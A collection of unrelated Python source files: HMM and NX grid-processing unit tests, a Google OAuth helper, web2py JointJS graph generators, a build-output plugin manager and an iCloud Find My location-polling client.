assert_equal( round( ems[:,j].sum(), 4 ), b )
assert_equal( round( ems[:,k].sum(), 4 ), c )
assert_equal( round( ems[:,l].sum(), 4 ), d )
assert_equal( round( ems.sum() ), len( seq ) )
@with_setup( tied_edge_setup, teardown )
def test_posterior_emissions_w_tied_edge_setup():
a_scores = [ 0.987, 0.9965, 0.183, 0.523 ]
b_scores = [ 0.0, 0.9977, 0.7364, 0.6318 ]
c_scores = [ 0.0, 0.9975, 0.6237, 0.8641 ]
d_scores = [ 0.0, 0.0021, 0.2017, 1.5105 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
i, j, k, l = indices['M1'], indices['M2'], indices['M3'], indices['I2']
for seq, a, b, c, d in zip( sequences, a_scores, b_scores, c_scores, d_scores ):
trans, ems = model.forward_backward( seq )
ems = np.exp( ems )
assert_equal( round( ems[:,i].sum(), 4 ), a )
assert_equal( round( ems[:,j].sum(), 4 ), b )
assert_equal( round( ems[:,k].sum(), 4 ), c )
assert_equal( round( ems[:,l].sum(), 4 ), d )
assert_equal( round( ems.sum() ), len( seq ) )
@with_setup( setup, teardown )
def test_properties():
assert_equal( model.edge_count(), 29 )
assert_equal( model.state_count(), 12 )
assert_equal( model.name, "Global Alignment" )
@with_setup( setup, teardown )
def test_to_json():
b = json.loads( model.to_json() )
assert_equal( b['name'], 'Global Alignment' )
assert_equal( len(b['edges']), 29 )
assert_equal( len(b['states']), 12 )
assert_equal( b['silent_index'], 7 )
@with_setup( setup, teardown )
def test_from_json():
hmm = HiddenMarkovModel.from_json( model.to_json() )
assert_equal( hmm.edge_count(), 29 )
assert_equal( hmm.state_count(), 12 )
assert_equal( hmm.name, "Global Alignment" )
|
# -*- coding: utf-8 -*-
import unittest
import os
from contextlib import contextmanager
import itertools
import threading
import numpy as np
from .test_task import test_task
from .. import h5regulargrid
from ...io import nxfs
from ...utils.tests import genindexing
from .. import utils
from .. import nxwrap
from .. import axis
from ...utils import units
from ...io import target
class test_task_generic(test_task):
@contextmanager
def _nxprocess(self, method=None):
h5filename = os.path.join(self.dir.path, "test.h5")
root = nxfs.Path("/", h5file=h5filename).nxroot()
entry = root.new_nxentry()
parameters = {"name": "fromraw", "a": 1, "b": 2}
name = target.prepare(parameters["name"])
nxprocess = entry.nxprocess(name, parameters=parameters, dependencies=None)
info = {}
shape = (2, 10, 13)
self.stackdim = 0
nstack, nhor, nvert = shape
z = "z", range(nvert), {"units": "um", "title": "vertical"}
y = "y", range(nhor), {"units": "um", "title": "horizontal"}
x = "x", range(nstack), None
yencres = 2
zencres = 3
ypossmax = 4
zpossmax = 6
posmap = (
np.arange(nhor)[np.newaxis, :]
+ np.arange(nvert)[:, np.newaxis] / (nvert - 1.0) * ypossmax
)
yenc = np.stack([posmap.T * yencres] * nstack, axis=self.stackdim)
posmap = (
np.arange(nvert)[:, np.newaxis]
+ np.arange(nhor)[np.newaxis, :] / (nhor - 1.0) * zpossmax
)
zenc = np.stack([posmap.T * zencres] * nstack, axis=self.stackdim)
dtype = np.float32
signals = ["Fe-K", "Si-K", "Al-K", "S-K", "Ce-L"]
counters = ["arr_iodet", "arr_idet", "arr_samy", "arr_samz"]
if method == "replace":
index = tuple(
[np.random.randint(0, shape[i], 10).tolist() for i in range(3)]
)
indexinfo = list(index)
indexinfo.insert(self.stackdim, slice(None))
info["index"] = tuple(indexinfo)
elif method == "align":
info["axes"] = (
axis.factory(range(nstack)),
axis.factory(units.Quantity(range(-nstack + 1, nhor), units="um")),
axis.factory(units.Quantity(range(-nstack + 1, nvert), units="um")),
)
elif method == "expression":
info["expression"] = "{}/{arr_iodet}"
info["copy"] = ["arr_iodet"]
info["select"] = nxprocess.results["counters"]["arr_iodet"]
elif method == "copy":
info["expression"] = "{}"
info["copy"] = ["Fe-K", "Si-K"]
info["skip"] = [s for s in signals if s not in info["copy"]] + counters
elif method == "resample":
info["encoders"] = {
"y": {"counter": "arr_samy", "resolution": yencres},
"z": {"counter": "arr_samz", "resolution": zencres},
}
info["shift"] = {"y": ypossmax, "z": zpossmax}
groups = {}
for group in range(2):
groups["detector{:02d}".format(group)] = signals
groups["counters"] = counters
for group, signals in groups.items():
group = nxprocess.results.nxdata(group).mkdir()
positioners = nxprocess.results.positioners()
for name in signals:
if name == "arr_samy":
data = yenc
elif name == "arr_samz":
data = zenc
else:
data = np.random.normal(size=shape)
data = data.astype(dtype)
if method == "crop":
data[:, 0, :] = np.nan
data[:, -2:, :] = np.nan
data[:, :, 0:2] = np.nan
data[:, :, -1] = np.nan
info["y"] = y[1][1:-2]
info["z"] = z[1][2:-1]
elif method == "replace":
data[index] = -1
elif method == "minlog":
mi = np.min(data) * 1.1
if mi == 0:
mi = -1
data -= mi
elif method == "align":
hot = np.max(data) * 1.1
for i in range(nstack):
data[i, i, i] = hot
group.add_signal(name, data=data)
group.set_axes(x, y, z)
try:
yield nxprocess, info
finally:
# root.remove(recursive=True)
pass
def test_grid(self):
with self._nxprocess() as proc:
proc, info = proc
grid = h5regulargrid.NXRegularGrid(proc)
self._check_grid(grid)
nxdata = proc.results["detector00"]
grid = h5regulargrid.NXSignalRegularGrid(nxdata.signal)
self._check_grid(grid)
def test_crop(self):
with self._nxprocess(method="crop") as proc1:
proc1, info = proc1
parameters = {
"method": "crop",
"default": "Si-K",
"sliced": False,
"reference": "Al-K",
"nanval": np.nan,
}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
grid3 = h5regulargrid.NXRegularGrid(proc3)
self.assertEqual(
{sig.name for sig in grid1.signals}, {sig.name for sig in grid2.signals}
)
self.assertFalse(np.isnan(grid2.values).any())
np.testing.assert_array_equal(grid2.values, grid3.values)
for k, v in info.items():
for ax in grid2.axes:
if ax.name == k:
np.testing.assert_array_equal(ax.magnitude, v)
break
else:
assert False
self.assertEqual(proc1.default.signal.name, parameters["default"])
def test_replace(self):
with self._nxprocess(method="replace") as proc1:
proc1, info = proc1
parameters = {
"method": "replace",
"default": "Si-K",
"sliced": False,
"old": -1,
"new": -2,
}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
grid3 = h5regulargrid.NXRegularGrid(proc3)
self.assertEqual(
{sig.name for sig in grid1.signals}, {sig.name for sig in grid2.signals}
)
np.testing.assert_array_equal(grid2.values, grid3.values)
np.testing.assert_array_equal(
grid1.values[info["index"]], parameters["old"]
)
np.testing.assert_array_equal(
grid2.values[info["index"]], parameters["new"]
)
self.assertEqual(proc1.default.signal.name, parameters["default"])
def test_minlog(self):
with self._nxprocess(method="minlog") as proc1:
proc1, info = proc1
parameters = {"method": "minlog", "sliced": False}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
grid3 = h5regulargrid.NXRegularGrid(proc3)
self.assertEqual(
{sig.name for sig in grid1.signals}, {sig.name for sig in grid2.signals}
)
np.testing.assert_array_equal(grid2.values, grid3.values)
np.testing.assert_array_equal(-np.log(grid1), grid3.values)
def test_align(self):
with self._nxprocess(method="align") as proc1:
proc1, info = proc1
parameters = {
"method": "align",
"alignmethod": "max",
"reference": "Fe-K",
"refimageindex": 0,
"default": "Fe-K",
}
proc2 = self._run_task(parameters, proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
axes = grid2.axes
axes.pop(grid2.stackdim)
for ax1, ax2 in zip(info["axes"], axes):
self.assertEqual(ax1, ax2)
def test_expression(self):
with self._nxprocess(method="expression") as proc1:
proc1, info = proc1
copy = [{"method": "regex", "pattern": name} for name in info["copy"]]
parameters = {
"method": "expression",
"expression": info["expression"],
"copy": copy,
"sliced": False,
}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
self._check_axes(grid1, grid2)
index = grid1.locate(info["select"], None, None, None)
norm = grid1[index]
inorm = index[grid1.stackdim]
for i in range(grid1.shape[grid1.stackdim]):
index = list(index)
index[grid1.stackdim] = i
index = tuple(index)
data = grid1[index]
if grid1.signals[i].name not in info["copy"]:
data = data / norm
np.testing.assert_array_equal(data, grid2[index])
def test_resample(self):
with self._nxprocess(method="resample") as proc1:
proc1, info = proc1
params = ((["y"], ["y", "z"]), (True, False))
for i, p in enumerate(itertools.product(*params), 1):
axes, crop = p
encoders = {k: v for k, v in info["encoders"].items() if k in axes}
parameters = {
"name": "crop{}".format(i),
"method": "resample",
"encoders": encoders,
"crop": crop,
}
proc2 = self._run_task(parameters, proc1)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
# Check new axes position
encoder_signals = {}
offsets = proc2.results["encoder_offset"].read().tolist()
offsets.insert(grid2.stackdim, 0)
for ax1, ax2, offset in zip(grid1.axes, grid2.axes, offsets):
name = ax1.name
if name in axes:
n = int(np.ceil(info["shift"][name] / 2.0))
if crop:
ax1 = axis.factory(ax1[n:-n])
else:
add = np.arange(1, n + 1) * ax1.stepsize
addstart = ax1.start - add[::-1]
addend = ax1.end + add
x = (
addstart.magnitude.tolist()
+ ax1.magnitude.tolist()
+ addend.magnitude.tolist()
)
ax1 = axis.factory(units.Quantity(x, units=ax1.units))
resolution = units.Quantity(
parameters["encoders"][name]["resolution"],
units=1 / ax2.units,
)
encoder_signals[name] = (
(ax2.values * resolution + offset)
.to("dimensionless")
.magnitude
)
self._check_axis(ax1, ax2)
# Check encoder signals
signals = grid2.signal_names
for axname, encinfo in encoders.items():
i = signals.index(encinfo["counter"])
enc = grid2[i, ...]
encnan = np.isnan(enc)
self.assertTrue(crop ^ encnan.any())
# Expected encoder values
encvalues = encoder_signals[axname]
index = [np.newaxis] * enc.ndim
if axname == "y":
index[1] = slice(None)
else:
index[2] = slice(None)
encvalues = encvalues[tuple(index)]
# Handle nan's
if not crop:
m = np.ones(enc.shape)
m[encnan] = np.nan
encvalues = encvalues * m
encvalues[encnan] = 999
enc[encnan] = 999
self.assertTrue(np.isclose(enc, encvalues).all())
def test_copy(self):
with self._nxprocess(method="copy") as proc1:
proc1, info = proc1
copy = [{"method": "regex", "pattern": name} for name in info["copy"]]
skip = [{"method": "regex", "pattern": name} for name in info["skip"]]
parameters = {
"method": "expression",
"expression": info["expression"],
"copy": copy,
"skip": skip,
"sliced": False,
}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
            grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
signals1 = {s.name for s in grid1.signals if s.name not in info["skip"]}
signals2 = {s.name for s in grid2.signals}
self.assertEqual(signals1, signals2)
index = [None] * grid2.ndim
for s2 in grid2.signals:
for s1 in grid1.signals:
if s1.name == s2.name and s1.parent.name == s2.parent.name:
break
index[grid1.stackdim] = s1
index1 = grid1.locate(*index)
index[grid2.stackdim] = s2
index2 = grid2.locate(*index)
np.testing.assert_array_equal(grid1[index1], grid2[index2])
@unittest.skip("h5py doesn't fully support concurrency")
def test_concurrency(self):
with self._nxprocess(method="copy") as proc1:
proc1, info = proc1
copy = [{"method": "regex", "pattern": name} for name in info["copy"]]
skip = [{"method": "regex", "pattern": name} for name in info["skip"]]
parameters = {
"method": "expression",
"expression": info["expression"],
"copy": copy,
"skip": skip,
"sliced": False,
}
previoustask = utils.nxpathtotask(proc1)
tasks = []
threads = []
nthreads = 5
for i in range(nthreads):
newtask = utils.create_task(dependencies=previoustask, **parameters)
tasks.append(newtask)
t = threading.Thread(target=newtask.run)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
output = tasks[0].output
for task in tasks:
                self.assertFalse(task.done)
                self.assertEqual(task.output, output)
proc1.root.ls(recursive=True)
def test_scenevis(self):
with self._nxprocess(method="scenevis") as proc1:
proc1, info = proc1
outputparent = proc1.root["images"]
obj1 = {
"items": [
("detector00/Fe-K", 0),
("detector00/Si-K", 0),
("detector00/Al-K", 0),
]
}
parameters = {
"method": "scenevis",
"outputparent": outputparent,
"objects": [obj1],
"instrument": "sxm",
"title": "title1",
"plot": False,
}
proc2 = self._run_task(parameters, proc1)
parameters["title"] = "title2"
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
def _check_axes(self, grid1, grid2):
for ax1, ax2 in zip(grid1.axes, grid2.axes):
self._check_axis(ax1, ax2)
def _check_axis(self, ax1, ax2):
if ax1.type == "quantitative":
self.assertEqual(ax1, ax2)
else:
self.assertEqual(len(ax1), len(ax2))
for v1, v2 in zip(ax1, ax2):
self.assertEqual(v1.name, v2.name)
def _check_grid(self, grid):
data = grid.values
self.assertEqual(grid.shape, data.shape)
self.assertEqual(grid.ndim, data.ndim)
self.assertEqual(grid.size, data.size)
np.testing.assert_array_equal(grid[:], data)
indices = genindexing.genindexingn(
data.shape, advanced=False, eco=False, nmax=50
)
for index in indices:
np.testing.assert_array_equal(grid[index], data[index])
for a, b in zip(grid, data):
np.testing.assert_array_equal(a, b)
def test_suite():
"""Test suite including all test suites"""
testSuite = unittest.TestSuite()
testSuite.addTest(test_task_generic("test_grid"))
testSuite.addTest(test_task_generic("test_copy"))
testSuite.addTest(test_task_generic("test_concurrency"))
testSuite.addTest(test_task_generic("test_crop"))
testSuite.addTest(test_task_generic("test_replace"))
testSuite.addTest(test_task_generic("test_minlog"))
testSuite.addTest(test_task_generic("test_align"))
testSuite.addTest(test_task_generic("test_expression"))
testSuite.addTest(test_task_generic("test_resample"))
testSuite.addTest(test_task_generic("test_scenevis"))
return testSuite
if __name__ == "__main__":
import sys
mysuite = test_suite()
runner = unittest.TextTestRunner()
if not runner.run(mysuite).wasSuccessful():
sys.exit(1)
|
from os import getenv
from utils.etc import REQ_TYPE, request
async def get_token(code: str) -> dict:
return await request(
REQ_TYPE.POST,
url="https://oauth2.googleapis.com/token",
data={
"code": code,
"client_id": getenv("GOOGLE_CLIENT_ID"),
"client_secret": getenv("GOOGLE_CLIENT_SECRET"),
"redirect_uri": getenv("GOOGLE_REDIRECT_URI"),
"grant_type": "authorization_code",
},
)
async def get_user_info(token: str) -> dict:
return await request(
REQ_TYPE.GET,
url="https://www.googleapis.com/userinfo/v2/me",
headers={"Authorization": f"Bearer {token}"},
)
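# Illustrative usage sketch (not part of the original module): the standard
# authorization-code flow, e.g. inside a hypothetical OAuth callback handler.
# Google's token response carries the bearer token in the "access_token" field.
async def handle_oauth_callback(code: str) -> dict:
    token = await get_token(code)
    return await get_user_info(token["access_token"])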
|
class Task(object):
def __init__(self, task_name):
self.task_name = task_name
class Assignment(object):
"""The work assignment
Contains an identifier, a description and a set of ExportActions.
"""
def __init__(self, identifier, description="", export_actions=None):
if ' ' in identifier:
raise ValueError
if export_actions is None:
export_actions = []
self.identifier = identifier
self.description = description
self.export_actions = export_actions
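# Illustrative usage sketch (not part of the original module): identifiers must
# not contain spaces, otherwise the constructor raises ValueError.
if __name__ == "__main__":
    assignment = Assignment("survey-2016", description="Field survey export")
    try:
        Assignment("bad identifier")
    except ValueError:
        print("identifiers must not contain spaces")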
|
# - Coding UTF8 -
#
# Networked Decision Making
# Site: http://code.google.com/p/global-decision-making-system/
#
# License Code: GPL, General Public License v. 2.0
# License Content: Creative Commons Attribution 3.0
#
# Also visit: www.web2py.com
# or Groups: http://groups.google.com/group/web2py
# For details on the web framework used for this development
#
# Developed by Russ King (newglobalstrategy@gmail.com)
# Russ also blogs occasionally to pass the time at proudofyourplanent.blogspot.com
# His general thinking on why this project is very important is available at
# http://www.scribd.com/doc/98216626/New-Global-Strategy
from decimal import *
from gluon import XML
def initgraph(width=1000, height=1000):
txt = r'''
var graph = new joint.dia.Graph;
var paper = new joint.dia.Paper({
el: $('#map'),
width: %d,
height: %d,
model: graph,
defaultLink: new joint.dia.Link({
attrs: { '.marker-target': { d: 'M 10 0 L 0 5 L 10 10 z', fill: 'green' },
'.connection': { stroke: 'green', 'stroke-width': 5 }}
}),
validateConnection: function(cellViewS, magnetS, cellViewT, magnetT, end, linkView) {
return (magnetS !== magnetT);
},
snapLinks: { radius: 75 }
''' % (width, height)
return XML(txt)
def portangle(objname, posx, posy, text='default', fillcolour='blue', fontsize=10, width=140, height=140, ports='tb', textcolour = 'black' ):
if ports == 'tb' and width == 160:
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
inPorts: ['t'],
outPorts: ['b'],
attrs: {'.label': { text: '%s', fill:'%s', 'font-size': %d,'ref-x': .12 },
rect: { fill: '%s' },
'.inPorts circle': { fill: '#16A085' }, '.inPorts': {transform: 'rotate(-87)', 'ref-x':-3.0,'ref-y':5.0},
'.outPorts circle': { fill: '#16A085' },'.outPorts': {transform: 'rotate(28)', 'ref-x':4.0,'ref-y':50.0}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
elif ports == 'tb':
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
inPorts: ['t'],
outPorts: ['b'],
attrs: {'.label': { text: '%s', fill: '%s', 'font-size': %d,'ref-x': .12 },
rect: { fill: '%s' },
'.inPorts circle': { fill: '#16A085' }, '.inPorts': {transform: 'rotate(-91)', 'ref-x':48.0,'ref-y':10.0},
'.outPorts circle': { fill: '#16A085' },'.outPorts': {transform: 'rotate(38)', 'ref-x':4.0,'ref-y':-20.0}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
elif ports == 'b':
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
outPorts: ['b'],
attrs: {'.label': { text: '%s', fill: '%s', 'font-size': %d,'ref-x': .12 }, rect: { fill: '%s' },
'.outPorts circle': { fill: '#16A085' },'.outPorts': {transform: 'rotate(35)'}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
elif ports == 't':
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
inPorts: ['t'],
attrs: {'.label': { text: '%s', fill: '%s', 'font-size': %d,'ref-x': .12 }, rect: { fill: '%s' },
'.inPorts circle': { fill: '#16A085' }, '.inPorts': {transform: 'rotate(-90)'}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
else: # ports == 'lr':
txt = r''' var %s = new joint.shapes.devs.Model({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
inPorts: ['l'],
outPorts: ['r'],
attrs: {'.label': { text: '%s', fill: '%s', 'font-size': %d,'ref-x': .12 },
rect: { fill: '%s' },
'.inPorts circle': { fill: '#16A085' }, '.inPorts': {transform: 'rotate(0)'},
'.outPorts circle': { fill: '#16A085' },'.outPorts': {transform: 'rotate(0)'}}
});
''' % (objname, objname, posx, posy, width, height, text, textcolour, fontsize, fillcolour)
return XML(txt)
def smallangle(objname, posx, posy, text='default', fillcolour='blue', fontsize=10, width=140, height=140, ports='tb',
link='http://bla.com', textcolour = 'white'):
txt = r''' var %s = new joint.shapes.custom.ElementLink({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
attrs: { rect: { fill: '%s' },
a: { 'xlink:href': '%s', cursor: 'pointer' },
text: { text: '%s', fill: '%s', 'font-size': %d}}
});
''' % (objname, objname, posx, posy, width, height, fillcolour, link, text, textcolour, fontsize)
return XML(txt)
def linkangle(objname, posx, posy, text='default', fillcolour='blue', fontsize=10, width=140, height=140, ports='tb',
link='http://bla.com'):
txt = r''' var %s = new joint.shapes.custom.ElementLink({
id: '%s',
position: { x: %d, y: %d },
size: { width: %d, height: %d },
attrs: { rect: { fill: '%s' },
a: { 'xlink:href': '%s', cursor: 'pointer' },
text: { text: '%s', fill: 'white', 'font-size': %d}}
});
''' % (objname, objname, posx, posy, width, height, fillcolour, link, text, fontsize)
return XML(txt)
def rectangle(objname, posx, posy, text='default', fillcolour='blue', fontsize=10, width=140, height=140, ports='notused' ):
txt = r''' var %s = new joint.shapes.basic.Rect({
position: { x: %d, y: %d },
size: { width: %d, height: %d },
attrs: { rect: { fill: '%s' }, text: { text: '%s', fill: 'white', 'font-size': %d } }
});
''' % (objname, posx, posy, width, height, fillcolour, text, fontsize)
return XML(txt)
def link(objname, source='rect', target='rect0', sourceport='b', targetport='t'):
txt = r''' var %s = new joint.dia.Link({
source: { id: %s.id,
port: '%s' },
target: { id: %s.id,
port: '%s' },
attrs: { '.connection': { stroke: 'yellow', 'stroke-width': 5, 'stroke-dasharray': '5 3' },
'.marker-target': { fill: 'yellow', d: 'M 10 0 L 0 5 L 10 10 z' }}
});
''' % (objname, source, sourceport, target, targetport)
return XML(txt)
def metrolink(objname, source='rect', target='rect0', sourceport='b', targetport='t'):
txt = r''' var %s = new joint.dia.Link({
source: { id: %s.id,
port: '%s' },
target: { id: %s.id,
port: '%s' },
attrs: { '.connection': { stroke: 'yellow', 'stroke-width': 5, 'stroke-dasharray': '5 3' },
'.marker-target': { fill: 'yellow', d: 'M 10 0 L 0 5 L 10 10 z' }}
});
%s.set('router', { name: 'metro' });
%s.set('connector', { name: 'rounded', args: { radius: 60 }});
''' % (objname, source, sourceport, target, targetport, objname, objname)
return XML(txt)
def newmetlink(objname, source='rect', target='rect0', sourceport='b', targetport='t', dasharray=False,
linethickness=5):
if dasharray:
txt = r''' var %s = new joint.dia.Link({
source: { id: %s.id,
port: '%s' },
target: { id: %s.id,
port: '%s' },
attrs: { '.connection': { stroke: 'yellow', 'stroke-width': %d, 'stroke-dasharray': '5 3' },
'.marker-target': { fill: 'yellow', d: 'M 10 0 L 0 5 L 10 10 z' }}
});
%s.set('router', { name: 'metro' });
%s.set('connector', { name: 'rounded', args: { radius: 60 }});
''' % (objname, source, sourceport, target, targetport, linethickness, objname, objname)
else:
txt = r''' var %s = new joint.dia.Link({
source: { id: %s.id,
port: '%s' },
target: { id: %s.id,
port: '%s' },
attrs: { '.connection': { stroke: 'yellow', 'stroke-width': %d},
'.marker-target': { fill: 'yellow', d: 'M 10 0 L 0 5 L 10 10 z' }}
});
%s.set('router', { name: 'metro' });
%s.set('connector', { name: 'rounded', args: { radius: 60 }});
''' % (objname, source, sourceport, target, targetport, linethickness, objname, objname)
return XML(txt)
def addobjects(objlist):
txt = r'[rect,rect0, rect2, rect3, link, link1,link2]'
return XML(txt)
def colourcode(qtype, status, priority):
"""This returns a colour in rgba format for colour coding the
nodes on the network
>>> colourcode('quest','inprogress',100)
'rgba(140,80,20,100)'
>>> colourcode('quest','inprogress',0)
'rgba(80,100,60,100)'
>>> colourcode('quest','resolved',100)
'rgba(120,255,70,70)'
>>> colourcode('action','inprogress',0)
'rgba(80,230,250,70)'
"""
if qtype == 'action' and status == 'In Progress':
# is this ok
colourstr = 'rgb(80,230,250)'
elif qtype == 'quest' and status == 'Resolved':
colourstr = 'rgb(40,100,1)'
else:
priority = Decimal(priority)
colourstr = ('rgb(' + redfnc(priority) + ',' + greenfnc(priority) + ','
+ bluefnc(priority) + ')')
return colourstr
def textcolour(qtype, status, priority):
"""This returns a colour for the text on the question
nodes on the network
Aiming to get good contrast between background and text in due course
"""
if qtype == 'action' and status == 'In Progress':
# is this ok
textcolourstring = 'white'
elif qtype == 'quest' and status == 'Resolved':
textcolourstring = 'white'
else:
textcolourstring = 'black'
return textcolourstring
# plan is to set this up to go from a range of rgb at 0 to 100 priority and range is rgb(80,100,60) to 140,80,20 -
# now revised based on initial thoughts.xlsm
def redfnc(priority):
#colint= int(90 + (priority * Decimal(1.6)))
colint = 255
return str(colint)
def greenfnc(priority):
colint = min(int(500 - priority * Decimal(5.0)), 255)
return str(colint)
def bluefnc(priority):
"""Return the position of an object in position p on heading h (unit vector after time t if travelling at speed s
>>> bluefnc(100)
'20'
"""
colint = max(int(100 - (priority * Decimal(2.0))), 0)
return str(colint)
def _test():
import doctest
doctest.testmod()
if __name__ == '__main__':
# Can run with -v option if you want to confirm tests were run
_test()
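# Hedged usage sketch (illustrative only; a web2py controller/view context is assumed):
# graph_js = initgraph(800, 600)
# node_a = rectangle('rect', 50, 50, text='Start', fillcolour='navy')
# node_b = rectangle('rect0', 300, 200, text='Finish', fillcolour='green')
# edge = link('link', source='rect', target='rect0')
# The returned XML fragments would be concatenated inside a <script> block in the view.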
|
# Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0
# -------------------------------------------------------------------------
# output.py - applies all output plugins to a message. Output plugins
# can be used to format build output or also redirect it to additional
# sources.
# --------------------------------------------------------------------------
from vespene.common.logger import Logger
from vespene.common.plugin_loader import PluginLoader
LOG = Logger()
class OutputManager(object):
def __init__(self):
self.plugin_loader = PluginLoader()
self.plugins = self.plugin_loader.get_output_plugins()
def get_msg(self, build, msg):
for p in self.plugins:
msg = p.filter(build, msg)
return msg
|
import os, logging, time, json, urllib.request, urllib.error, socket
from http.cookiejar import MozillaCookieJar
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class AppleFindMy():
terminate = False
online = True
username = None
password = None
deviceId = None
deviceName = None
cookiejar = None
loggedin = False
findmeBaseURL = None
serverContext = None
interval = 5
lastLookup = 0
def __init__(self):
self.cookiejar = MozillaCookieJar(os.path.dirname(os.path.realpath(__file__)) + '/../.cookies.txt')
try:
self.cookiejar.load()
except OSError as e:
if e.errno == 2:
self.cookiejar.save()
else:
logger.error(e)
def stop(self):
self.terminate = True
def online(self, online = True):
self.online = online
def offline(self, offline = True):
self.online = not offline
def login(self):
if not self.online:
return False
url = 'https://setup.icloud.com/setup/ws/1/accountLogin'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Content-Type': 'text/plain;charset=UTF-8',
'Accept': '*/*',
'Origin': 'https://www.icloud.com',
'Referer': 'https://www.icloud.com/',
'Accept-Language': 'en-UK,en;q=0.9,en-US;q=0.8'
}
requestData = '{"appName":"find","apple_id":"' + self.username + '","password":"' + self.password + '"}'
requestData = requestData.encode('utf-8')
try:
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookiejar))
urllib.request.install_opener(opener)
request = urllib.request.Request(url, requestData, headers)
with urllib.request.urlopen(request, timeout=5) as response:
responseData = response.read().decode(response.headers.get_content_charset(failobj = 'utf-8'))
# logger.debug(responseData)
responseData = json.loads(responseData)
self.findmeBaseURL = responseData['webservices']['findme']['url']
self.cookiejar.save()
except urllib.error.HTTPError as e:
logger.error(e.code)
return False
except urllib.error.URLError as e:
logger.error(e)
return False
except socket.timeout as e:
logger.error(e)
return False
self.loggedin = True
return True
def getLocation(self):
if not self.online:
return None
if not self.loggedin and not self.login():
return None
elapsedTime = time.time() - self.lastLookup
if elapsedTime < self.interval:
return None
location = None
url = self.findmeBaseURL + '/fmipservice/client/web/refreshClient'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
'Content-Type': 'text/plain',
'Accept': '*/*',
'Origin': 'https://www.icloud.com',
'Referer': 'https://www.icloud.com/',
'Accept-Language': 'en-UK,en;q=0.9,en-US;q=0.8'
}
requestData = {}
if(self.serverContext):
requestData['serverContext'] = self.serverContext
requestData['clientContext'] = json.loads('{"appName":"iCloud Find (Web)","appVersion":"2.0","timezone":"Europe/Amsterdam","inactiveTime":2,"apiVersion":"3.0","deviceListVersion":1,"fmly":true,"shouldLocate":true}')
if(self.deviceId):
requestData['clientContext']['selectedDevice'] = self.deviceId
else:
requestData['clientContext']['selectedDevice'] = 'all'
requestData = json.dumps(requestData)
requestData = bytes(requestData, 'utf-8')
# logger.debug(requestData)
try:
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookiejar))
urllib.request.install_opener(opener)
request = urllib.request.Request(url, requestData, headers)
with urllib.request.urlopen(request, timeout=1) as response:
responseData = response.read().decode(response.headers.get_content_charset(failobj = 'utf-8'))
# logger.debug(responseData)
responseData = json.loads(responseData)
self.serverContext = responseData['serverContext']
for device in responseData['content']:
if not self.deviceId and not self.deviceName:
logger.info("{} - {}".format(device['id'], device['name']))
elif self.deviceId and device['id'] == self.deviceId:
break
elif self.deviceName and device['name'] == self.deviceName:
break
device = None
if not self.deviceId and not self.deviceName:
return None
if not device:
logger.error("No device found")
return None
if device and 'location' in device and device['location']:
latitude = device['location']['latitude']
longitude = device['location']['longitude']
accuracy = device['location']['horizontalAccuracy']
altitude = device['location']['altitude']
location = [latitude, longitude, accuracy, altitude]
# logger.debug(location)
else:
logger.error("No location found in device {} \"{}\"".format(device['id'], device['name']))
logger.debug(device)
self.cookiejar.save()
except urllib.error.HTTPError as e:
if e.code == 404:
logger.warning("Not found {}".format(url))
else:
logger.error(e.code)
return None
except urllib.error.URLError as e:
logger.error(e)
return None
except socket.timeout as e:
logger.error(e)
return None
self.lastLookup = time.time()
return location
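# Hedged usage sketch (credentials and device name are placeholders, not part of this module):
# finder = AppleFindMy()
# finder.username = "user@example.com"
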